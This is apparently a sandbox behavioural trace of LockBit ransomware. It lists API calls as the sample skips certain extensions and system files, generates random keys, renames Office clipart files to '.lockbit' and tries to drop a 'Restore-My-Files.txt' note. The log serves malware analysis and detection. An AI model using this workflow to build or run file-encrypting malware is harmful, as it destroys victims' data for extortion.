(lpString1=".ani", lpString2=".WMF") returned -1 [0145.931] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0145.931] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0145.931] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0145.931] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0145.932] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0145.932] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152688.WMF") returned 1 [0145.933] lstrcmpiW (lpString1="ntldr", lpString2="J0152688.WMF") returned 1 [0145.933] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152688.WMF") returned 1 [0145.933] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152688.WMF") returned -1 [0145.933] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152688.WMF") returned -1 [0145.933] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152688.WMF") returned 1 [0145.933] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152688.WMF") returned -1 [0145.933] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0145.933] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF") returned=".WMF" [0145.933] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0145.933] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0145.933] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0145.934] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0145.934] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF.lockbit") returned 72 [0145.934] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152688.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0145.935] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0145.935] malloc (_Size=0x40068) returned 0x3e70008 [0145.935] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=34676) returned 1 [0145.935] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.936] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0145.936] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.936] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0145.936] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0145.941] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.941] malloc (_Size=0xa6) returned 0x1fa2ed8 [0145.941] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0145.942] free (_Block=0x1fa2ed8) [0145.942] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152688.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0145.942] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0145.942] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0145.942] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152690.WMF", cAlternateFileName="")) returned 1 [0145.942] lstrcmpiW (lpString1=".", lpString2="J0152690.WMF") returned -1 [0145.942] lstrcmpiW (lpString1="..", lpString2="J0152690.WMF") returned -1 [0145.942] PathFindExtensionW (pszPath="J0152690.WMF") returned=".WMF" [0145.942] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0145.942] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0145.942] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0145.942] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0145.942] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0145.942] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0145.943] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0145.944] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.944] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0145.945] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0145.945] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0145.945] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0145.945] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152690.WMF") returned 1 [0145.945] lstrcmpiW (lpString1="ntldr", lpString2="J0152690.WMF") returned 1 [0145.945] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152690.WMF") returned 1 [0145.945] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152690.WMF") returned -1 [0145.945] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152690.WMF") returned -1 [0145.945] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152690.WMF") returned 1 [0145.945] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152690.WMF") returned -1 [0145.945] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0145.945] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned=".WMF" [0145.945] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0145.945] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0145.945] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0145.945] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0145.945] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0145.945] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0145.945] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0145.945] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0145.946] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0145.946] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF.lockbit") returned 72 [0145.946] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152690.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0145.947] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0145.947] malloc (_Size=0x40068) returned 0x3ef0008 [0145.947] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=1268) returned 1 [0145.948] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.948] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0145.948] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0145.948] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0145.949] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0145.949] ReadFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0145.953] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0145.953] malloc (_Size=0xa6) returned 0x1fa2ed8 [0145.953] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0145.954] free (_Block=0x1fa2ed8) [0145.954] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0145.954] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0145.954] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0145.954] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x544, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152694.WMF", cAlternateFileName="")) returned 1 [0145.954] lstrcmpiW (lpString1=".", lpString2="J0152694.WMF") returned -1 [0145.954] lstrcmpiW (lpString1="..", lpString2="J0152694.WMF") returned -1 [0145.955] PathFindExtensionW (pszPath="J0152694.WMF") returned=".WMF" [0145.955] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0145.955] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0145.956] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0145.956] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0145.957] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0145.957] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0145.957] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152694.WMF") returned 1 [0145.957] lstrcmpiW (lpString1="ntldr", lpString2="J0152694.WMF") returned 1 [0145.957] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152694.WMF") returned 1 [0145.957] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152694.WMF") returned -1 [0145.957] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152694.WMF") returned -1 [0145.957] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152694.WMF") returned 1 [0145.957] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152694.WMF") returned -1 [0145.957] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0145.957] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF") returned=".WMF" [0145.957] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0145.957] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0145.957] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0145.957] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0145.957] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0145.957] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0145.957] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0145.957] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0145.957] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0145.957] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0145.957] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0145.957] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0145.958] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0145.958] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF.lockbit") returned 72 [0145.958] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152694.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152694.wmf"), 